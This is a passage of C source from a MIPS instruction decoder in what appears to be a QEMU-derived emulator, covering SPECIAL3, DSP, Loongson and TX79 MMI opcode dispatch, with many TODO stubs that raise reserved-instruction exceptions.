case OPC_DDIVU_G_2F: case OPC_DMOD_G_2F: case OPC_DMODU_G_2F: check_insn(ctx, INSN_LOONGSON2F); gen_loongson_integer(ctx, op1, rd, rs, rt); break; #endif default: /* Invalid */ MIPS_INVAL("special2_legacy"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special3_r6(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, rt, rd, sa; uint32_t op1, op2; int16_t imm; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; imm = (int16_t)ctx->opcode >> 7; op1 = MASK_SPECIAL3(ctx->opcode); switch (op1) { case R6_OPC_PREF: if (rt >= 24) { /* hint codes 24-31 are reserved and signal RI */ generate_exception_end(ctx, EXCP_RI); } /* Treat as NOP. */ break; case R6_OPC_CACHE: check_cp0_enabled(ctx); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, imm); } break; case R6_OPC_SC: gen_st_cond(ctx, rt, rs, imm, MO_TESL, false); break; case R6_OPC_LL: gen_ld(ctx, op1, rt, rs, imm); break; case OPC_BSHFL: { if (rd == 0) { /* Treat as NOP. 
*/ break; } op2 = MASK_BSHFL(ctx->opcode); switch (op2) { case OPC_ALIGN: case OPC_ALIGN_1: case OPC_ALIGN_2: case OPC_ALIGN_3: gen_align(ctx, 32, rd, rs, rt, sa & 3); break; case OPC_BITSWAP: gen_bitswap(ctx, op2, rd, rt); break; } } break; case OPC_GINV: if (unlikely(ctx->gi <= 1)) { generate_exception_end(ctx, EXCP_RI); } check_cp0_enabled(ctx); switch ((ctx->opcode >> 6) & 3) { case 0: /* GINVI */ /* Treat as NOP. */ break; case 2: /* GINVT */ gen_helper_0e1i(ginvt, tcg_ctx->cpu_gpr[rs], extract32(ctx->opcode, 8, 2)); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; #if defined(TARGET_MIPS64) case R6_OPC_SCD: gen_st_cond(ctx, rt, rs, imm, MO_TEQ, false); break; case R6_OPC_LLD: gen_ld(ctx, op1, rt, rs, imm); break; case OPC_DBSHFL: check_mips_64(ctx); { if (rd == 0) { /* Treat as NOP. */ break; } op2 = MASK_DBSHFL(ctx->opcode); switch (op2) { case OPC_DALIGN: case OPC_DALIGN_1: case OPC_DALIGN_2: case OPC_DALIGN_3: case OPC_DALIGN_4: case OPC_DALIGN_5: case OPC_DALIGN_6: case OPC_DALIGN_7: gen_align(ctx, 64, rd, rs, rt, sa & 7); break; case OPC_DBITSWAP: gen_bitswap(ctx, op2, rd, rt); break; } } break; #endif default: /* Invalid */ MIPS_INVAL("special3_r6"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc_special3_legacy(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, rt, rd; uint32_t op1, op2; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; op1 = MASK_SPECIAL3(ctx->opcode); switch (op1) { case OPC_DIV_G_2E: case OPC_DIVU_G_2E: case OPC_MOD_G_2E: case OPC_MODU_G_2E: case OPC_MULT_G_2E: case OPC_MULTU_G_2E: /* * OPC_MULT_G_2E, OPC_ADDUH_QB_DSP, OPC_MUL_PH_DSP have * the same mask and op1. */ if ((ctx->insn_flags & ASE_DSP_R2) && (op1 == OPC_MULT_G_2E)) { op2 = MASK_ADDUH_QB(ctx->opcode); switch (op2) { case OPC_ADDUH_QB: case OPC_ADDUH_R_QB: case OPC_ADDQH_PH: case OPC_ADDQH_R_PH: case OPC_ADDQH_W: case OPC_ADDQH_R_W: case OPC_SUBUH_QB: case OPC_SUBUH_R_QB: case OPC_SUBQH_PH: case OPC_SUBQH_R_PH: case OPC_SUBQH_W: case OPC_SUBQH_R_W: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_MUL_PH: case OPC_MUL_S_PH: case OPC_MULQ_S_W: case OPC_MULQ_RS_W: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); break; default: MIPS_INVAL("MASK ADDUH.QB"); generate_exception_end(ctx, EXCP_RI); break; } } else if (ctx->insn_flags & INSN_LOONGSON2E) { gen_loongson_integer(ctx, op1, rd, rs, rt); } else { generate_exception_end(ctx, EXCP_RI); } break; case OPC_LX_DSP: op2 = MASK_LX(ctx->opcode); switch (op2) { #if defined(TARGET_MIPS64) case OPC_LDX: #endif case OPC_LBUX: case OPC_LHX: case OPC_LWX: gen_mipsdsp_ld(ctx, op2, rd, rs, rt); break; default: /* Invalid */ MIPS_INVAL("MASK LX"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_ABSQ_S_PH_DSP: op2 = MASK_ABSQ_S_PH(ctx->opcode); switch (op2) { case OPC_ABSQ_S_QB: case OPC_ABSQ_S_PH: case OPC_ABSQ_S_W: case OPC_PRECEQ_W_PHL: case OPC_PRECEQ_W_PHR: case OPC_PRECEQU_PH_QBL: case OPC_PRECEQU_PH_QBR: case OPC_PRECEQU_PH_QBLA: case OPC_PRECEQU_PH_QBRA: case OPC_PRECEU_PH_QBL: case OPC_PRECEU_PH_QBR: case OPC_PRECEU_PH_QBLA: case OPC_PRECEU_PH_QBRA: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_BITREV: case OPC_REPL_QB: case OPC_REPLV_QB: case OPC_REPL_PH: case OPC_REPLV_PH: gen_mipsdsp_bitinsn(ctx, op1, op2, rd, rt); break; default: MIPS_INVAL("MASK ABSQ_S.PH"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_ADDU_QB_DSP: op2 = MASK_ADDU_QB(ctx->opcode); switch 
(op2) { case OPC_ADDQ_PH: case OPC_ADDQ_S_PH: case OPC_ADDQ_S_W: case OPC_ADDU_QB: case OPC_ADDU_S_QB: case OPC_ADDU_PH: case OPC_ADDU_S_PH: case OPC_SUBQ_PH: case OPC_SUBQ_S_PH: case OPC_SUBQ_S_W: case OPC_SUBU_QB: case OPC_SUBU_S_QB: case OPC_SUBU_PH: case OPC_SUBU_S_PH: case OPC_ADDSC: case OPC_ADDWC: case OPC_MODSUB: case OPC_RADDU_W_QB: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_MULEU_S_PH_QBL: case OPC_MULEU_S_PH_QBR: case OPC_MULQ_RS_PH: case OPC_MULEQ_S_W_PHL: case OPC_MULEQ_S_W_PHR: case OPC_MULQ_S_PH: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); break; default: /* Invalid */ MIPS_INVAL("MASK ADDU.QB"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_CMPU_EQ_QB_DSP: op2 = MASK_CMPU_EQ_QB(ctx->opcode); switch (op2) { case OPC_PRECR_SRA_PH_W: case OPC_PRECR_SRA_R_PH_W: gen_mipsdsp_arith(ctx, op1, op2, rt, rs, rd); break; case OPC_PRECR_QB_PH: case OPC_PRECRQ_QB_PH: case OPC_PRECRQ_PH_W: case OPC_PRECRQ_RS_PH_W: case OPC_PRECRQU_S_QB_PH: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_CMPU_EQ_QB: case OPC_CMPU_LT_QB: case OPC_CMPU_LE_QB: case OPC_CMP_EQ_PH: case OPC_CMP_LT_PH: case OPC_CMP_LE_PH: gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 0); break; case OPC_CMPGU_EQ_QB: case OPC_CMPGU_LT_QB: case OPC_CMPGU_LE_QB: case OPC_CMPGDU_EQ_QB: case OPC_CMPGDU_LT_QB: case OPC_CMPGDU_LE_QB: case OPC_PICK_QB: case OPC_PICK_PH: case OPC_PACKRL_PH: gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 1); break; default: /* Invalid */ MIPS_INVAL("MASK CMPU.EQ.QB"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_SHLL_QB_DSP: gen_mipsdsp_shift(ctx, op1, rd, rs, rt); break; case OPC_DPA_W_PH_DSP: op2 = MASK_DPA_W_PH(ctx->opcode); switch (op2) { case OPC_DPAU_H_QBL: case OPC_DPAU_H_QBR: case OPC_DPSU_H_QBL: case OPC_DPSU_H_QBR: case OPC_DPA_W_PH: case OPC_DPAX_W_PH: case OPC_DPAQ_S_W_PH: case OPC_DPAQX_S_W_PH: case OPC_DPAQX_SA_W_PH: case OPC_DPS_W_PH: case OPC_DPSX_W_PH: case OPC_DPSQ_S_W_PH: case OPC_DPSQX_S_W_PH: case OPC_DPSQX_SA_W_PH: case OPC_MULSAQ_S_W_PH: case OPC_DPAQ_SA_L_W: case OPC_DPSQ_SA_L_W: case OPC_MAQ_S_W_PHL: case OPC_MAQ_S_W_PHR: case OPC_MAQ_SA_W_PHL: case OPC_MAQ_SA_W_PHR: case OPC_MULSA_W_PH: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); break; default: /* Invalid */ MIPS_INVAL("MASK DPAW.PH"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_INSV_DSP: op2 = MASK_INSV(ctx->opcode); switch (op2) { case OPC_INSV: check_dsp(ctx); { TCGv t0, t1; if (rt == 0) { break; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); gen_helper_insv(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_env, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); break; } default: /* Invalid */ MIPS_INVAL("MASK INSV"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_APPEND_DSP: gen_mipsdsp_append(env, ctx, op1, rt, rs, rd); break; case OPC_EXTR_W_DSP: op2 = MASK_EXTR_W(ctx->opcode); switch (op2) { case OPC_EXTR_W: case OPC_EXTR_R_W: case OPC_EXTR_RS_W: case OPC_EXTR_S_H: case OPC_EXTRV_S_H: case OPC_EXTRV_W: case OPC_EXTRV_R_W: case OPC_EXTRV_RS_W: case OPC_EXTP: case OPC_EXTPV: case OPC_EXTPDP: case OPC_EXTPDPV: gen_mipsdsp_accinsn(ctx, op1, op2, rt, rs, rd, 1); break; case OPC_RDDSP: gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 1); break; case OPC_SHILO: case OPC_SHILOV: case OPC_MTHLIP: case OPC_WRDSP: gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 0); break; default: /* Invalid */ MIPS_INVAL("MASK EXTR.W"); 
generate_exception_end(ctx, EXCP_RI); break; } break; #if defined(TARGET_MIPS64) case OPC_DDIV_G_2E: case OPC_DDIVU_G_2E: case OPC_DMULT_G_2E: case OPC_DMULTU_G_2E: case OPC_DMOD_G_2E: case OPC_DMODU_G_2E: check_insn(ctx, INSN_LOONGSON2E); gen_loongson_integer(ctx, op1, rd, rs, rt); break; case OPC_ABSQ_S_QH_DSP: op2 = MASK_ABSQ_S_QH(ctx->opcode); switch (op2) { case OPC_PRECEQ_L_PWL: case OPC_PRECEQ_L_PWR: case OPC_PRECEQ_PW_QHL: case OPC_PRECEQ_PW_QHR: case OPC_PRECEQ_PW_QHLA: case OPC_PRECEQ_PW_QHRA: case OPC_PRECEQU_QH_OBL: case OPC_PRECEQU_QH_OBR: case OPC_PRECEQU_QH_OBLA: case OPC_PRECEQU_QH_OBRA: case OPC_PRECEU_QH_OBL: case OPC_PRECEU_QH_OBR: case OPC_PRECEU_QH_OBLA: case OPC_PRECEU_QH_OBRA: case OPC_ABSQ_S_OB: case OPC_ABSQ_S_PW: case OPC_ABSQ_S_QH: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_REPL_OB: case OPC_REPL_PW: case OPC_REPL_QH: case OPC_REPLV_OB: case OPC_REPLV_PW: case OPC_REPLV_QH: gen_mipsdsp_bitinsn(ctx, op1, op2, rd, rt); break; default: /* Invalid */ MIPS_INVAL("MASK ABSQ_S.QH"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_ADDU_OB_DSP: op2 = MASK_ADDU_OB(ctx->opcode); switch (op2) { case OPC_RADDU_L_OB: case OPC_SUBQ_PW: case OPC_SUBQ_S_PW: case OPC_SUBQ_QH: case OPC_SUBQ_S_QH: case OPC_SUBU_OB: case OPC_SUBU_S_OB: case OPC_SUBU_QH: case OPC_SUBU_S_QH: case OPC_SUBUH_OB: case OPC_SUBUH_R_OB: case OPC_ADDQ_PW: case OPC_ADDQ_S_PW: case OPC_ADDQ_QH: case OPC_ADDQ_S_QH: case OPC_ADDU_OB: case OPC_ADDU_S_OB: case OPC_ADDU_QH: case OPC_ADDU_S_QH: case OPC_ADDUH_OB: case OPC_ADDUH_R_OB: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_MULEQ_S_PW_QHL: case OPC_MULEQ_S_PW_QHR: case OPC_MULEU_S_QH_OBL: case OPC_MULEU_S_QH_OBR: case OPC_MULQ_RS_QH: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); break; default: /* Invalid */ MIPS_INVAL("MASK ADDU.OB"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_CMPU_EQ_OB_DSP: op2 = MASK_CMPU_EQ_OB(ctx->opcode); switch (op2) { case OPC_PRECR_SRA_QH_PW: case OPC_PRECR_SRA_R_QH_PW: /* Return value is rt. 
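Hence rt is passed in the destination slot of gen_mipsdsp_arith() below, i.e. the operands are (rt, rs, rd) rather than the usual (rd, rs, rt).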
*/ gen_mipsdsp_arith(ctx, op1, op2, rt, rs, rd); break; case OPC_PRECR_OB_QH: case OPC_PRECRQ_OB_QH: case OPC_PRECRQ_PW_L: case OPC_PRECRQ_QH_PW: case OPC_PRECRQ_RS_QH_PW: case OPC_PRECRQU_S_OB_QH: gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); break; case OPC_CMPU_EQ_OB: case OPC_CMPU_LT_OB: case OPC_CMPU_LE_OB: case OPC_CMP_EQ_QH: case OPC_CMP_LT_QH: case OPC_CMP_LE_QH: case OPC_CMP_EQ_PW: case OPC_CMP_LT_PW: case OPC_CMP_LE_PW: gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 0); break; case OPC_CMPGDU_EQ_OB: case OPC_CMPGDU_LT_OB: case OPC_CMPGDU_LE_OB: case OPC_CMPGU_EQ_OB: case OPC_CMPGU_LT_OB: case OPC_CMPGU_LE_OB: case OPC_PACKRL_PW: case OPC_PICK_OB: case OPC_PICK_PW: case OPC_PICK_QH: gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 1); break; default: /* Invalid */ MIPS_INVAL("MASK CMPU_EQ.OB"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DAPPEND_DSP: gen_mipsdsp_append(env, ctx, op1, rt, rs, rd); break; case OPC_DEXTR_W_DSP: op2 = MASK_DEXTR_W(ctx->opcode); switch (op2) { case OPC_DEXTP: case OPC_DEXTPDP: case OPC_DEXTPDPV: case OPC_DEXTPV: case OPC_DEXTR_L: case OPC_DEXTR_R_L: case OPC_DEXTR_RS_L: case OPC_DEXTR_W: case OPC_DEXTR_R_W: case OPC_DEXTR_RS_W: case OPC_DEXTR_S_H: case OPC_DEXTRV_L: case OPC_DEXTRV_R_L: case OPC_DEXTRV_RS_L: case OPC_DEXTRV_S_H: case OPC_DEXTRV_W: case OPC_DEXTRV_R_W: case OPC_DEXTRV_RS_W: gen_mipsdsp_accinsn(ctx, op1, op2, rt, rs, rd, 1); break; case OPC_DMTHLIP: case OPC_DSHILO: case OPC_DSHILOV: gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 0); break; default: /* Invalid */ MIPS_INVAL("MASK EXTR.W"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DPAQ_W_QH_DSP: op2 = MASK_DPAQ_W_QH(ctx->opcode); switch (op2) { case OPC_DPAU_H_OBL: case OPC_DPAU_H_OBR: case OPC_DPSU_H_OBL: case OPC_DPSU_H_OBR: case OPC_DPA_W_QH: case OPC_DPAQ_S_W_QH: case OPC_DPS_W_QH: case OPC_DPSQ_S_W_QH: case OPC_MULSAQ_S_W_QH: case OPC_DPAQ_SA_L_PW: case OPC_DPSQ_SA_L_PW: case OPC_MULSAQ_S_L_PW: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); break; case OPC_MAQ_S_W_QHLL: case OPC_MAQ_S_W_QHLR: case OPC_MAQ_S_W_QHRL: case OPC_MAQ_S_W_QHRR: case OPC_MAQ_SA_W_QHLL: case OPC_MAQ_SA_W_QHLR: case OPC_MAQ_SA_W_QHRL: case OPC_MAQ_SA_W_QHRR: case OPC_MAQ_S_L_PWL: case OPC_MAQ_S_L_PWR: case OPC_DMADD: case OPC_DMADDU: case OPC_DMSUB: case OPC_DMSUBU: gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); break; default: /* Invalid */ MIPS_INVAL("MASK DPAQ.W.QH"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_DINSV_DSP: op2 = MASK_INSV(ctx->opcode); switch (op2) { case OPC_DINSV: { TCGv t0, t1; if (rt == 0) { break; } check_dsp(ctx); t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); gen_load_gpr(tcg_ctx, t1, rs); gen_helper_dinsv(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_env, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); break; } default: /* Invalid */ MIPS_INVAL("MASK DINSV"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_SHLL_OB_DSP: gen_mipsdsp_shift(ctx, op1, rd, rs, rt); break; #endif default: /* Invalid */ MIPS_INVAL("special3_legacy"); generate_exception_end(ctx, EXCP_RI); break; } } #if defined(TARGET_MIPS64) static void decode_mmi0(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI0(ctx->opcode); switch (opc) { case MMI_OPC_0_PADDW: /* TODO: MMI_OPC_0_PADDW */ case MMI_OPC_0_PSUBW: /* TODO: MMI_OPC_0_PSUBW */ case MMI_OPC_0_PCGTW: /* TODO: MMI_OPC_0_PCGTW */ case MMI_OPC_0_PMAXW: /* TODO: MMI_OPC_0_PMAXW */ case MMI_OPC_0_PADDH: /* 
TODO: MMI_OPC_0_PADDH */ case MMI_OPC_0_PSUBH: /* TODO: MMI_OPC_0_PSUBH */ case MMI_OPC_0_PCGTH: /* TODO: MMI_OPC_0_PCGTH */ case MMI_OPC_0_PMAXH: /* TODO: MMI_OPC_0_PMAXH */ case MMI_OPC_0_PADDB: /* TODO: MMI_OPC_0_PADDB */ case MMI_OPC_0_PSUBB: /* TODO: MMI_OPC_0_PSUBB */ case MMI_OPC_0_PCGTB: /* TODO: MMI_OPC_0_PCGTB */ case MMI_OPC_0_PADDSW: /* TODO: MMI_OPC_0_PADDSW */ case MMI_OPC_0_PSUBSW: /* TODO: MMI_OPC_0_PSUBSW */ case MMI_OPC_0_PEXTLW: /* TODO: MMI_OPC_0_PEXTLW */ case MMI_OPC_0_PPACW: /* TODO: MMI_OPC_0_PPACW */ case MMI_OPC_0_PADDSH: /* TODO: MMI_OPC_0_PADDSH */ case MMI_OPC_0_PSUBSH: /* TODO: MMI_OPC_0_PSUBSH */ case MMI_OPC_0_PEXTLH: /* TODO: MMI_OPC_0_PEXTLH */ case MMI_OPC_0_PPACH: /* TODO: MMI_OPC_0_PPACH */ case MMI_OPC_0_PADDSB: /* TODO: MMI_OPC_0_PADDSB */ case MMI_OPC_0_PSUBSB: /* TODO: MMI_OPC_0_PSUBSB */ case MMI_OPC_0_PEXTLB: /* TODO: MMI_OPC_0_PEXTLB */ case MMI_OPC_0_PPACB: /* TODO: MMI_OPC_0_PPACB */ case MMI_OPC_0_PEXT5: /* TODO: MMI_OPC_0_PEXT5 */ case MMI_OPC_0_PPAC5: /* TODO: MMI_OPC_0_PPAC5 */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI0 */ break; default: MIPS_INVAL("TX79 MMI class MMI0"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_mmi1(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI1(ctx->opcode); switch (opc) { case MMI_OPC_1_PABSW: /* TODO: MMI_OPC_1_PABSW */ case MMI_OPC_1_PCEQW: /* TODO: MMI_OPC_1_PCEQW */ case MMI_OPC_1_PMINW: /* TODO: MMI_OPC_1_PMINW */ case MMI_OPC_1_PADSBH: /* TODO: MMI_OPC_1_PADSBH */ case MMI_OPC_1_PABSH: /* TODO: MMI_OPC_1_PABSH */ case MMI_OPC_1_PCEQH: /* TODO: MMI_OPC_1_PCEQH */ case MMI_OPC_1_PMINH: /* TODO: MMI_OPC_1_PMINH */ case MMI_OPC_1_PCEQB: /* TODO: MMI_OPC_1_PCEQB */ case MMI_OPC_1_PADDUW: /* TODO: MMI_OPC_1_PADDUW */ case MMI_OPC_1_PSUBUW: /* TODO: MMI_OPC_1_PSUBUW */ case MMI_OPC_1_PEXTUW: /* TODO: MMI_OPC_1_PEXTUW */ case MMI_OPC_1_PADDUH: /* TODO: MMI_OPC_1_PADDUH */ case MMI_OPC_1_PSUBUH: /* TODO: MMI_OPC_1_PSUBUH */ case MMI_OPC_1_PEXTUH: /* TODO: MMI_OPC_1_PEXTUH */ case MMI_OPC_1_PADDUB: /* TODO: MMI_OPC_1_PADDUB */ case MMI_OPC_1_PSUBUB: /* TODO: MMI_OPC_1_PSUBUB */ case MMI_OPC_1_PEXTUB: /* TODO: MMI_OPC_1_PEXTUB */ case MMI_OPC_1_QFSRV: /* TODO: MMI_OPC_1_QFSRV */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI1 */ break; default: MIPS_INVAL("TX79 MMI class MMI1"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_mmi2(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI2(ctx->opcode); switch (opc) { case MMI_OPC_2_PMADDW: /* TODO: MMI_OPC_2_PMADDW */ case MMI_OPC_2_PSLLVW: /* TODO: MMI_OPC_2_PSLLVW */ case MMI_OPC_2_PSRLVW: /* TODO: MMI_OPC_2_PSRLVW */ case MMI_OPC_2_PMSUBW: /* TODO: MMI_OPC_2_PMSUBW */ case MMI_OPC_2_PMFHI: /* TODO: MMI_OPC_2_PMFHI */ case MMI_OPC_2_PMFLO: /* TODO: MMI_OPC_2_PMFLO */ case MMI_OPC_2_PINTH: /* TODO: MMI_OPC_2_PINTH */ case MMI_OPC_2_PMULTW: /* TODO: MMI_OPC_2_PMULTW */ case MMI_OPC_2_PDIVW: /* TODO: MMI_OPC_2_PDIVW */ case MMI_OPC_2_PMADDH: /* TODO: MMI_OPC_2_PMADDH */ case MMI_OPC_2_PHMADH: /* TODO: MMI_OPC_2_PHMADH */ case MMI_OPC_2_PAND: /* TODO: MMI_OPC_2_PAND */ case MMI_OPC_2_PXOR: /* TODO: MMI_OPC_2_PXOR */ case MMI_OPC_2_PMSUBH: /* TODO: MMI_OPC_2_PMSUBH */ case MMI_OPC_2_PHMSBH: /* TODO: MMI_OPC_2_PHMSBH */ case MMI_OPC_2_PEXEH: /* TODO: MMI_OPC_2_PEXEH */ case MMI_OPC_2_PREVH: /* TODO: MMI_OPC_2_PREVH */ case MMI_OPC_2_PMULTH: /* TODO: MMI_OPC_2_PMULTH */ case MMI_OPC_2_PDIVBW: /* TODO: MMI_OPC_2_PDIVBW */ case MMI_OPC_2_PEXEW: /* TODO: MMI_OPC_2_PEXEW */ 
case MMI_OPC_2_PROT3W: /* TODO: MMI_OPC_2_PROT3W */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI2 */ break; case MMI_OPC_2_PCPYLD: gen_mmi_pcpyld(ctx); break; default: MIPS_INVAL("TX79 MMI class MMI2"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_mmi3(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI3(ctx->opcode); switch (opc) { case MMI_OPC_3_PMADDUW: /* TODO: MMI_OPC_3_PMADDUW */ case MMI_OPC_3_PSRAVW: /* TODO: MMI_OPC_3_PSRAVW */ case MMI_OPC_3_PMTHI: /* TODO: MMI_OPC_3_PMTHI */ case MMI_OPC_3_PMTLO: /* TODO: MMI_OPC_3_PMTLO */ case MMI_OPC_3_PINTEH: /* TODO: MMI_OPC_3_PINTEH */ case MMI_OPC_3_PMULTUW: /* TODO: MMI_OPC_3_PMULTUW */ case MMI_OPC_3_PDIVUW: /* TODO: MMI_OPC_3_PDIVUW */ case MMI_OPC_3_POR: /* TODO: MMI_OPC_3_POR */ case MMI_OPC_3_PNOR: /* TODO: MMI_OPC_3_PNOR */ case MMI_OPC_3_PEXCH: /* TODO: MMI_OPC_3_PEXCH */ case MMI_OPC_3_PEXCW: /* TODO: MMI_OPC_3_PEXCW */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI3 */ break; case MMI_OPC_3_PCPYH: gen_mmi_pcpyh(ctx); break; case MMI_OPC_3_PCPYUD: gen_mmi_pcpyud(ctx); break; default: MIPS_INVAL("TX79 MMI class MMI3"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_mmi(CPUMIPSState *env, DisasContext *ctx) { uint32_t opc = MASK_MMI(ctx->opcode); int rs = extract32(ctx->opcode, 21, 5); int rt = extract32(ctx->opcode, 16, 5); int rd = extract32(ctx->opcode, 11, 5); switch (opc) { case MMI_OPC_CLASS_MMI0: decode_mmi0(env, ctx); break; case MMI_OPC_CLASS_MMI1: decode_mmi1(env, ctx); break; case MMI_OPC_CLASS_MMI2: decode_mmi2(env, ctx); break; case MMI_OPC_CLASS_MMI3: decode_mmi3(env, ctx); break; case MMI_OPC_MULT1: case MMI_OPC_MULTU1: case MMI_OPC_MADD: case MMI_OPC_MADDU: case MMI_OPC_MADD1: case MMI_OPC_MADDU1: gen_mul_txx9(ctx, opc, rd, rs, rt); break; case MMI_OPC_DIV1: case MMI_OPC_DIVU1: gen_div1_tx79(ctx, opc, rs, rt); break; case MMI_OPC_MTLO1: case MMI_OPC_MTHI1: gen_HILO1_tx79(ctx, opc, rs); break; case MMI_OPC_MFLO1: case MMI_OPC_MFHI1: gen_HILO1_tx79(ctx, opc, rd); break; case MMI_OPC_PLZCW: /* TODO: MMI_OPC_PLZCW */ case MMI_OPC_PMFHL: /* TODO: MMI_OPC_PMFHL */ case MMI_OPC_PMTHL: /* TODO: MMI_OPC_PMTHL */ case MMI_OPC_PSLLH: /* TODO: MMI_OPC_PSLLH */ case MMI_OPC_PSRLH: /* TODO: MMI_OPC_PSRLH */ case MMI_OPC_PSRAH: /* TODO: MMI_OPC_PSRAH */ case MMI_OPC_PSLLW: /* TODO: MMI_OPC_PSLLW */ case MMI_OPC_PSRLW: /* TODO: MMI_OPC_PSRLW */ case MMI_OPC_PSRAW: /* TODO: MMI_OPC_PSRAW */ generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_CLASS_MMI */ break; default: MIPS_INVAL("TX79 MMI class"); generate_exception_end(ctx, EXCP_RI); break; } } static void gen_mmi_lq(CPUMIPSState *env, DisasContext *ctx) { generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_LQ */ } static void gen_mmi_sq(DisasContext *ctx, int base, int rt, int offset) { generate_exception_end(ctx, EXCP_RI); /* TODO: MMI_OPC_SQ */ } /* * The TX79-specific instruction Store Quadword * * +--------+-------+-------+------------------------+ * | 011111 | base | rt | offset | SQ * +--------+-------+-------+------------------------+ * 6 5 5 16 * * has the same opcode as the Read Hardware Register instruction * * +--------+-------+-------+-------+-------+--------+ * | 011111 | 00000 | rt | rd | 00000 | 111011 | RDHWR * +--------+-------+-------+-------+-------+--------+ * 6 5 5 5 5 6 * * that is required, trapped and emulated by the Linux kernel. However, all * RDHWR encodings yield address error exceptions on the TX79 since the SQ * offset is odd. 
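* For example, the TLS read that the Linux kernel traps and emulates,
* rdhwr $3, $29 (0x7c03e83b), would parse as SQ with offset 0xe83b;
* the RDHWR function field 0b111011 supplies the offset's low bit, so
* every RDHWR encoding maps to an odd, and therefore misaligned, SQ
* offset.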
Therefore all valid SQ instructions can execute normally. * In user mode, QEMU must verify the upper and lower 11 bits to distinguish * between SQ and RDHWR, as the Linux kernel does. */ static void decode_mmi_sq(CPUMIPSState *env, DisasContext *ctx) { int base = extract32(ctx->opcode, 21, 5); int rt = extract32(ctx->opcode, 16, 5); int offset = extract32(ctx->opcode, 0, 16); gen_mmi_sq(ctx, base, rt, offset); } #endif static void decode_opc_special3(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs, rt, rd, sa; uint32_t op1, op2; int16_t imm; rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; imm = sextract32(ctx->opcode, 7, 9); op1 = MASK_SPECIAL3(ctx->opcode); /* * EVA loads and stores overlap Loongson 2E instructions decoded by * decode_opc_special3_legacy(), so be careful to allow their decoding when * EVA is absent. */ if (ctx->eva) { switch (op1) { case OPC_LWLE: case OPC_LWRE: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case 